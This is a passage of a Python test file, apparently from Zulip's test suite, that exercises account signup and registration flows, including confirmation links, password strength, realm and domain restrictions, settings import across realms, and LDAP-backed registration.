user_profile = self.nonreg_user("newguy")
self.assertEqual(user_profile.twenty_four_hour_time, realm.default_twenty_four_hour_time)
def test_signup_already_active(self) -> None:
"""
Check if signing up with an active email redirects to a login page.
"""
email = self.example_email("hamlet")
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertIn("login", result["Location"])
result = self.client_get(result.url)
self.assert_in_response("You've already registered", result)
def test_signup_system_bot(self) -> None:
email = "notification-bot@zulip.com"
result = self.client_post("/accounts/home/", {"email": email}, subdomain="lear")
self.assertEqual(result.status_code, 302)
self.assertIn("login", result["Location"])
result = self.client_get(result.url)
# This is not really the right error message, but at least it's an error.
self.assert_in_response("You've already registered", result)
def test_signup_existing_email(self) -> None:
"""
Check if signing up with an email used in another realm succeeds.
"""
email = self.example_email("hamlet")
self.verify_signup(email=email, realm=get_realm("lear"), subdomain="lear")
self.assertEqual(UserProfile.objects.filter(delivery_email=email).count(), 2)
def test_signup_invalid_name(self) -> None:
"""
Check if an invalid name during signup is handled properly.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS.
result = self.submit_reg_form_for_user(email, password, full_name="<invalid>")
self.assert_in_success_response(["Invalid characters in name!"], result)
# Verify that the user is asked for name and password
self.assert_in_success_response(["id_password", "id_full_name"], result)
def test_signup_without_password(self) -> None:
"""
Check if signing up without a password works properly when
password_auth_enabled is False.
"""
email = self.nonreg_email("newuser")
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
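# With password_auth_enabled patched to return False, the registration
# form has no password field, so we can submit the final form without one.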
with patch("zerver.views.registration.password_auth_enabled", return_value=False):
result = self.client_post(
"/accounts/register/",
{"full_name": "New User", "key": find_key_by_email(email), "terms": True},
)
# User should now be logged in.
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user("newuser")
self.assert_logged_in_user_id(user_profile.id)
def test_signup_without_full_name(self) -> None:
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
"/accounts/register/",
{
"password": password,
"key": find_key_by_email(email),
"terms": True,
"from_confirmation": "1",
},
)
self.assert_in_success_response(["We just need you to do one last thing."], result)
# Verify that the user is asked for name and password
self.assert_in_success_response(["id_password", "id_full_name"], result)
def test_signup_email_message_contains_org_header(self) -> None:
email = "newguy@zulip.com"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
from django.core.mail import outbox
self.assertEqual(outbox[0].extra_headers["List-Id"], "Zulip Dev <zulip.testserver>")
def test_signup_with_full_name(self) -> None:
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
"/accounts/register/",
{
"password": password,
"key": find_key_by_email(email),
"terms": True,
"full_name": "New Guy",
"from_confirmation": "1",
},
)
self.assert_in_success_response(["We just need you to do one last thing."], result)
def test_signup_with_weak_password(self) -> None:
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
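# Tighten the password policy so that "easy" fails: require at least 6
# characters and an estimated strength of at least 1000 guesses.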
with self.settings(PASSWORD_MIN_LENGTH=6, PASSWORD_MIN_GUESSES=1000):
result = self.client_post(
"/accounts/register/",
{
"password": "easy",
"key": find_key_by_email(email),
"terms": True,
"full_name": "New Guy",
"from_confirmation": "1",
},
)
self.assert_in_success_response(["We just need you to do one last thing."], result)
result = self.submit_reg_form_for_user(email, "easy", full_name="New Guy")
self.assert_in_success_response(["The password is too weak."], result)
with self.assertRaises(UserProfile.DoesNotExist):
# Account wasn't created.
get_user(email, get_realm("zulip"))
def test_signup_with_default_stream_group(self) -> None:
# Check that the user is subscribed to the streams of the default
# stream group as well as the default streams.
email = self.nonreg_email("newguy")
password = "newpassword"
realm = get_realm("zulip")
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
default_streams = []
existing_default_streams = DefaultStream.objects.filter(realm=realm)
self.assert_length(existing_default_streams, 1)
self.assertEqual(existing_default_streams[0].stream.name, "Verona")
default_streams.append(existing_default_streams[0].stream)
for stream_name in ["venice", "rome"]:
stream = get_stream(stream_name, realm)
do_add_default_stream(stream)
default_streams.append(stream)
group1_streams = []
for stream_name in ["scotland", "denmark"]:
stream = get_stream(stream_name, realm)
group1_streams.append(stream)
do_create_default_stream_group(realm, "group 1", "group 1 description", group1_streams)
result = self.submit_reg_form_for_user(email, password, default_stream_groups=["group 1"])
self.check_user_subscribed_only_to_streams("newguy", default_streams + group1_streams)
def test_signup_two_confirmation_links(self) -> None:
email = self.nonreg_email("newguy")
password = "newpassword"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
first_confirmation_url = self.get_confirmation_url_from_outbox(email)
first_confirmation_key = find_key_by_email(email)
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
second_confirmation_url = self.get_confirmation_url_from_outbox(email)
# Sanity check:
self.assertNotEqual(first_confirmation_url, second_confirmation_url)
# Register the account (this will use the second confirmation url):
result = self.submit_reg_form_for_user(
email, password, full_name="New Guy", from_confirmation="1"
)
self.assert_in_success_response(
["We just need you to do one last thing.", "New Guy", email], result
)
result = self.submit_reg_form_for_user(email, password, full_name="New Guy")
user_profile = UserProfile.objects.get(delivery_email=email)
self.assertEqual(user_profile.delivery_email, email)
# Now try to register using the first confirmation URL:
result = self.client_get(first_confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
"/accounts/register/",
{
"password": password,
"key": first_confirmation_key,
"terms": True,
"full_name": "New Guy",
"from_confirmation": "1",
},
)
# Error page should be displayed
self.assertEqual(result.status_code, 404)
self.assert_in_response("The registration link has expired or is not valid.", result)
def test_signup_with_multiple_default_stream_groups(self) -> None:
# Check that the user is subscribed to the streams of the default
# stream groups as well as the default streams.
email = self.nonreg_email("newguy")
password = "newpassword"
realm = get_realm("zulip")
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
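# Start from a clean slate: drop the realm's preexisting default streams
# so the subscription check below only covers what this test sets up.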
DefaultStream.objects.filter(realm=realm).delete()
default_streams = []
for stream_name in ["venice", "verona"]:
stream = get_stream(stream_name, realm)
do_add_default_stream(stream)
default_streams.append(stream)
group1_streams = []
for stream_name in ["scotland", "denmark"]:
stream = get_stream(stream_name, realm)
group1_streams.append(stream)
do_create_default_stream_group(realm, "group 1", "group 1 description", group1_streams)
group2_streams = []
for stream_name in ["scotland", "rome"]:
stream = get_stream(stream_name, realm)
group2_streams.append(stream)
do_create_default_stream_group(realm, "group 2", "group 2 description", group2_streams)
result = self.submit_reg_form_for_user(
email, password, default_stream_groups=["group 1", "group 2"]
)
self.check_user_subscribed_only_to_streams(
"newguy", list(set(default_streams + group1_streams + group2_streams))
)
def test_signup_without_user_settings_from_another_realm(self) -> None:
hamlet_in_zulip = self.example_user("hamlet")
email = hamlet_in_zulip.delivery_email
password = "newpassword"
subdomain = "lear"
realm = get_realm("lear")
# Customize hamlet's settings in the Zulip realm; the new Lear account below should not copy them.
hamlet_in_zulip.left_side_userlist = True
hamlet_in_zulip.default_language = "de"
hamlet_in_zulip.emojiset = "twitter"
hamlet_in_zulip.high_contrast_mode = True
hamlet_in_zulip.enter_sends = True
hamlet_in_zulip.tutorial_status = UserProfile.TUTORIAL_FINISHED
hamlet_in_zulip.save()
result = self.client_post("/accounts/home/", {"email": email}, subdomain=subdomain)
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"], subdomain=subdomain)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url, subdomain=subdomain)
self.assertEqual(result.status_code, 200)
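# source_realm_id="" corresponds to declining to import settings from an
# existing account, so the new Lear account should get the realm defaults.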
result = self.submit_reg_form_for_user(
email, password, source_realm_id="", HTTP_HOST=subdomain + ".testserver"
)
hamlet = get_user(self.example_email("hamlet"), realm)
self.assertEqual(hamlet.left_side_userlist, False)
self.assertEqual(hamlet.default_language, "en")
self.assertEqual(hamlet.emojiset, "google-blob")
self.assertEqual(hamlet.high_contrast_mode, False)
self.assertEqual(hamlet.enable_stream_audible_notifications, False)
self.assertEqual(hamlet.enter_sends, False)
self.assertEqual(hamlet.tutorial_status, UserProfile.TUTORIAL_WAITING)
def test_signup_with_user_settings_from_another_realm(self) -> None:
hamlet_in_zulip = self.example_user("hamlet")
email = hamlet_in_zulip.delivery_email
password = "newpassword"
subdomain = "lear"
lear_realm = get_realm("lear")
self.login("hamlet")
with get_test_image_file("img.png") as image_file:
self.client_post("/json/users/me/avatar", {"file": image_file})
hamlet_in_zulip.refresh_from_db()
hamlet_in_zulip.left_side_userlist = True
hamlet_in_zulip.default_language = "de"
hamlet_in_zulip.emojiset = "twitter"
hamlet_in_zulip.high_contrast_mode = True
hamlet_in_zulip.enter_sends = True
hamlet_in_zulip.tutorial_status = UserProfile.TUTORIAL_FINISHED
hamlet_in_zulip.save()
result = self.client_post("/accounts/home/", {"email": email}, subdomain=subdomain)
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"], subdomain=subdomain)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url, subdomain=subdomain)
self.assertEqual(result.status_code, 200)
result = self.client_post(
"/accounts/register/",
{"password": password, "key": find_key_by_email(email), "from_confirmation": "1"},
subdomain=subdomain,
)
self.assert_in_success_response(
[
"Import settings from existing Zulip account",
"selected >\n Zulip Dev",
"We just need you to do one last thing.",
],
result,
)
result = self.submit_reg_form_for_user(
email,
password,
source_realm_id=str(hamlet_in_zulip.realm.id),
HTTP_HOST=subdomain + ".testserver",
)
hamlet_in_lear = get_user(email, lear_realm)
self.assertEqual(hamlet_in_lear.left_side_userlist, True)
self.assertEqual(hamlet_in_lear.default_language, "de")
self.assertEqual(hamlet_in_lear.emojiset, "twitter")
self.assertEqual(hamlet_in_lear.high_contrast_mode, True)
self.assertEqual(hamlet_in_lear.enter_sends, True)
self.assertEqual(hamlet_in_lear.enable_stream_audible_notifications, False)
self.assertEqual(hamlet_in_lear.tutorial_status, UserProfile.TUTORIAL_FINISHED)
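# The avatar should have been copied over as well; compare the raw bytes
# of the two accounts' avatar files on disk.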
zulip_path_id = avatar_disk_path(hamlet_in_zulip)
lear_path_id = avatar_disk_path(hamlet_in_lear)
with open(zulip_path_id, "rb") as f:
zulip_avatar_bits = f.read()
with open(lear_path_id, "rb") as f:
lear_avatar_bits = f.read()
self.assertGreater(len(zulip_avatar_bits), 500)
self.assertEqual(zulip_avatar_bits, lear_avatar_bits)
def test_signup_invalid_subdomain(self) -> None:
"""
Check if attempting to authenticate to the wrong subdomain logs an
error and redirects.
"""
email = "newuser@zulip.com"
password = "newpassword"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
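# A fake authenticate() that reports an invalid-subdomain failure via
# return_data, mimicking a backend rejecting a subdomain mismatch.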
def invalid_subdomain(**kwargs: Any) -> Any:
return_data = kwargs.get("return_data", {})
return_data["invalid_subdomain"] = True
with patch("zerver.views.registration.authenticate", side_effect=invalid_subdomain):
with self.assertLogs(level="ERROR") as m:
result = self.client_post(
"/accounts/register/",
{
"password": password,
"full_name": "New User",
"key": find_key_by_email(email),
"terms": True,
},
)
self.assertEqual(
m.output,
["ERROR:root:Subdomain mismatch in registration zulip: newuser@zulip.com"],
)
self.assertEqual(result.status_code, 302)
def test_signup_using_invalid_subdomain_preserves_state_of_form(self) -> None:
"""
Check that when we give invalid subdomain and submit the registration form
all the values in the form are preserved.
"""
realm = get_realm("zulip")
password = "test"
email = self.example_email("iago")
realm_name = "Test"
result = self.client_post("/new/", {"email": email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
result = self.submit_reg_form_for_user(
email,
password,
# Subdomain is already used, by construction.
realm_subdomain=realm.string_id,
realm_name=realm_name,
source_realm_id=str(realm.id),
)
self.assert_in_success_response(
[
"Subdomain unavailable. Please choose a different one.",
"Zulip Dev\n",
'value="test"',
'name="realm_name"',
],
result,
)
def test_replace_subdomain_in_confirmation_link(self) -> None:
"""
Check that manually changing the subdomain in a registration
confirmation link doesn't allow you to register to a different realm.
"""
email = "newuser@zulip.com"
self.client_post("/accounts/home/", {"email": email})
result = self.client_post(
"/accounts/register/",
{
"password": "password",
"key": find_key_by_email(email),
"terms": True,
"full_name": "New User",
"from_confirmation": "1",
},
subdomain="zephyr",
)
self.assert_in_success_response(["We couldn't find your confirmation link"], result)
def test_signup_to_realm_on_manual_license_plan(self) -> None:
realm = get_realm("zulip")
denmark_stream = get_stream("Denmark", realm)
realm.signup_notifications_stream = denmark_stream
realm.save(update_fields=["signup_notifications_stream"])
_, ledger = self.subscribe_realm_to_monthly_plan_on_manual_license_management(realm, 5, 5)
with self.settings(BILLING_ENABLED=True):
form = HomepageForm({"email": self.nonreg_email("test")}, realm=realm)
self.assertIn(
"New members cannot join this organization because all Zulip licenses",
form.errors["email"][0],
)
last_message = Message.objects.last()
self.assertIn(
f"A new member ({self.nonreg_email('test')}) was unable to join your organization because all Zulip",
last_message.content,
)
self.assertEqual(last_message.recipient.type_id, denmark_stream.id)
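# Raising only licenses_at_next_renewal is not enough; the current
# license count still blocks new signups.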
ledger.licenses_at_next_renewal = 50
ledger.save(update_fields=["licenses_at_next_renewal"])
with self.settings(BILLING_ENABLED=True):
form = HomepageForm({"email": self.nonreg_email("test")}, realm=realm)
self.assertIn(
"New members cannot join this organization because all Zulip licenses",
form.errors["email"][0],
)
ledger.licenses = 50
ledger.save(update_fields=["licenses"])
with self.settings(BILLING_ENABLED=True):
form = HomepageForm({"email": self.nonreg_email("test")}, realm=realm)
self.assertEqual(form.errors, {})
def test_failed_signup_due_to_restricted_domain(self) -> None:
realm = get_realm("zulip")
do_set_realm_property(realm, "invite_required", False, acting_user=None)
do_set_realm_property(realm, "emails_restricted_to_domains", True, acting_user=None)
email = "user@acme.com"
form = HomepageForm({"email": email}, realm=realm)
self.assertIn(
f"Your email address, {email}, is not in one of the domains", form.errors["email"][0]
)
def test_failed_signup_due_to_disposable_email(self) -> None:
realm = get_realm("zulip")
realm.emails_restricted_to_domains = False
realm.disallow_disposable_email_addresses = True
realm.save()
email = "abc@mailnator.com"
form = HomepageForm({"email": email}, realm=realm)
self.assertIn("Please use your real email address", form.errors["email"][0])
def test_failed_signup_due_to_email_containing_plus(self) -> None:
realm = get_realm("zulip")
realm.emails_restricted_to_domains = True
realm.save()
email = "iago+label@zulip.com"
form = HomepageForm({"email": email}, realm=realm)
self.assertIn(
"Email addresses containing + are not allowed in this organization.",
form.errors["email"][0],
)
def test_failed_signup_due_to_invite_required(self) -> None:
realm = get_realm("zulip")
realm.invite_required = True
realm.save()
email = "user@zulip.com"
form = HomepageForm({"email": email}, realm=realm)
self.assertIn(f"Please request an invite for {email} from", form.errors["email"][0])
def test_failed_signup_due_to_nonexistent_realm(self) -> None:
email = "user@acme.com"
form = HomepageForm({"email": email}, realm=None)
self.assertIn(
f"organization you are trying to join using {email} does not exist",
form.errors["email"][0],
)
def test_access_signup_page_in_root_domain_without_realm(self) -> None:
result = self.client_get("/register", subdomain="", follow=True)
self.assert_in_success_response(["Find your Zulip accounts"], result)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_registration_from_confirmation(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
match = re.search(settings.EXTERNAL_HOST + r"(\S+)>", message.body)
assert match is not None
[confirmation_url] = match.groups()
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Full name should be set from LDAP
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assert_in_success_response(
[
"We just need you to do one last thing.",
"New LDAP fullname",
"newuser@zulip.com",
],
result,
)
# Verify that the user is asked for name
self.assert_in_success_response(["id_full_name"], result)
# Verify that the user is asked for their LDAP/Active Directory password.
self.assert_in_success_response(
["Enter your LDAP/Active Directory password.", "ldap-password"], result
)
self.assert_not_in_success_response(["id_password"], result)
# Test the TypeError exception handler
with patch(
"zproject.backends.ZulipLDAPAuthBackendBase.get_mapped_name", side_effect=TypeError
):
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assert_in_success_response(
["We just need you to do one last thing.", "newuser@zulip.com"], result
)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.EmailAuthBackend",
"zproject.backends.ZulipLDAPUserPopulator",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_populate_only_registration_from_confirmation(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
match = re.search(settings.EXTERNAL_HOST + r"(\S+)>", message.body)
assert match is not None
[confirmation_url] = match.groups()
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_BIND_PASSWORD="",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE="uid=%(user)s,ou=users,dc=zulip,dc=com",
):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Full name should be set from LDAP
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assert_in_success_response(
[
"We just need you to do one last thing.",
"New LDAP fullname",
"newuser@zulip.com",
],
result,
)
# Verify that the user is asked for name
self.assert_in_success_response(["id_full_name"], result)
# Verify that the user is NOT asked for their LDAP/Active Directory
# password, since LDAP is not configured for authentication in this test.
self.assert_not_in_success_response(
["Enter your LDAP/Active Directory password.", "ldap-password"], result
)
# If we were using e.g. the SAML auth backend, there
# shouldn't be a password prompt, but since this test uses the
# EmailAuthBackend, there should be a password field here.
self.assert_in_success_response(["id_password"], result)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_registration_end_to_end(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
full_name = "New LDAP fullname"
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Click confirmation link
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
# Full name should be set from LDAP
self.assert_in_success_response(
["We just need you to do one last thing.", full_name, "newuser@zulip.com"], result
)
# Submit the final form with the wrong password.
result = self.submit_reg_form_for_user(
email,
"wrongpassword",
full_name=full_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
# Didn't create an account
with self.assertRaises(UserProfile.DoesNotExist):
user_profile = UserProfile.objects.get(delivery_email=email)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
# Submit the final form with the correct password.
result = self.submit_reg_form_for_user(
email,
password,
full_name=full_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from the form, which was prefilled from LDAP.
self.assertEqual(user_profile.full_name, full_name)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_split_full_name_mapping(self) -> None:
self.init_default_ldap_database()
ldap_user_attr_map = {"first_name": "sn", "last_name": "cn"}
subdomain = "zulip"
email = "newuser_splitname@zulip.com"
password = self.ldap_password("newuser_splitname")
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Click confirmation link
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
# Test split name mapping.
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from the form, which was prefilled from LDAP.
self.assertEqual(user_profile.full_name, "First Last")
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_auto_registration_on_login(self) -> None:
"""The most common way for LDAP authentication to be used is with a
server that doesn't have a terms-of-service required, in which
case we offer a complete single-sign-on experience (where the
user just enters their LDAP username and password, and their
account is created if it doesn't already exist).
This test verifies that flow.
"""
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {
"full_name": "cn",
"custom_profile_field__phone_number": "homePhone",
}
full_name = "New LDAP fullname"
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
self.login_with_return(email, password, HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes directly from LDAP via the attribute map.
self.assertEqual(user_profile.full_name, full_name)
# Test custom profile fields are properly synced.
phone_number_field = CustomProfileField.objects.get(
realm=user_profile.realm, name="Phone number"
)
phone_number_field_value = CustomProfileFieldValue.objects.get(
user_profile=user_profile, field=phone_number_field
)
self.assertEqual(phone_number_field_value.value, "a-new-number")
@override_settings(AUTHENTICATION_BACKENDS=("zproject.backends.ZulipLDAPAuthBackend",))
def test_ldap_auto_registration_on_login_invalid_email_in_directory(self) -> None:
password = self.ldap_password("newuser_with_email")
username = "newuser_with_email"
subdomain = "zulip"
self.init_default_ldap_database()
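# Corrupt the directory entry's mail attribute so email validation fails
# during LDAP auto-registration.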
self.change_ldap_user_attr("newuser_with_email", "mail", "thisisnotavalidemail")
with self.settings(
LDAP_EMAIL_ATTR="mail",
), self.assertLogs("zulip.auth.ldap", "WARNING") as mock_log:
original_user_count = UserProfile.objects.count()
self.login_with_return(username, password, HTTP_HOST=subdomain + ".testserver")
# Verify that the process failed as intended - no UserProfile is created.
self.assertEqual(UserProfile.objects.count(), original_user_count)
self.assertEqual(
mock_log.output,
["WARNING:zulip.auth.ldap:thisisnotavalidemail is not a valid email address."],
)
@override_settings(AUTHENTICATION_BACKENDS=("zproject.backends.ZulipLDAPAuthBackend",))
def test_ldap_registration_multiple_realms(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
self.init_default_ldap_database()
ldap_user_attr_map = {
"full_name": "cn",
}
do_create_realm("test", "test", emails_restricted_to_domains=False)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
subdomain = "zulip"
self.login_with_return(email, password, HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email, realm=get_realm("zulip"))
self.logout()
# Test that registration in the second realm works.
subdomain = "test"
self.login_with_return(email, password, HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email, realm=get_realm("test"))
self.assertEqual(user_profile.delivery_email, email)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_registration_when_names_changes_are_disabled(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Click the confirmation link. This sets the 'authenticated_full_name'
# session variable, which will be used to set the full name of
# the user.
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
with patch("zerver.views.registration.name_changes_disabled", return_value=True):
result = self.submit_reg_form_for_user(
email,
password,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from LDAP session.
self.assertEqual(user_profile.full_name, "New LDAP fullname")
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
